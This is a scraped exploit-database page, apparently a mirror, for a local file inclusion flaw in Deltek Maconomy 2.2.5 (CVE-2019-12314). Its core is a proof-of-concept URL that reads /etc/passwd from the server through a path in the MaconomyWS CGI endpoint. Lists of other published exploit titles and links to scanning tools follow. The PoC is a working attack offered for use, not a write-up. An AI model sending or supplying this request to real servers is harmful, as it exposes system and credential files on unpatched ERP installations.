Search for hundreds of thousands of exploits

"Deltek Maconomy 2.2.5 - Local File Inclusion"

Author

Exploit author

JameelNabbo

Platform

Exploit platform

multiple

Release date

Exploit published date

2019-05-27

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
# Exploit Title: Maconomy Erp local file include
# Date: 22/05/2019
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.deltek.com
# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
# CVE: CVE-2019-12314
POC:

POC:
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
Example
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
Release DateTitleTypePlatformAuthor
2020-06-01"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution"webappsphps1gh
2020-06-01"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation"webappsphp"Raphael Karger"
2020-06-01"VMware vCenter Server 6.7 - Authentication Bypass"webappsmultiplePhotubias
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
Release DateTitleTypePlatformAuthor
2020-06-01"VMware vCenter Server 6.7 - Authentication Bypass"webappsmultiplePhotubias
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-22"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)"remotemultipleMetasploit
2020-05-21"OpenEDX platform Ironwood 2.5 - Remote Code Execution"webappsmultiple"Daniel MonzΓ³n"
2020-05-20"BIND - 'TSIG' Denial of Service"dosmultiple"Teppei Fukuda"
2020-05-18"HP LinuxKI 6.01 - Remote Command Injection"remotemultiple"Cody Winkler"
2020-05-11"LibreNMS 1.46 - 'search' SQL Injection"webappsmultiplePunt
2020-05-05"Saltstack 3000.1 - Remote Code Execution"remotemultiple"Jasper Lievisse Adriaanse"
2020-05-01"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)"remotemultipleMetasploit
Release DateTitleTypePlatformAuthor
2019-06-04"IceWarp 10.4.4 - Local File Inclusion"webappsphpJameelNabbo
2019-05-27"Deltek Maconomy 2.2.5 - Local File Inclusion"webappsmultipleJameelNabbo
2019-05-23"Nagios XI 5.6.1 - SQL injection"webappsphpJameelNabbo
2019-03-04"Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution"webappshardwareJameelNabbo
2019-02-15"Jinja2 2.10 - 'from_string' Server Side Template Injection"webappspythonJameelNabbo
2018-02-16"Twig < 2.4.4 - Server Side Template Injection"webappsphpJameelNabbo
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46931/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.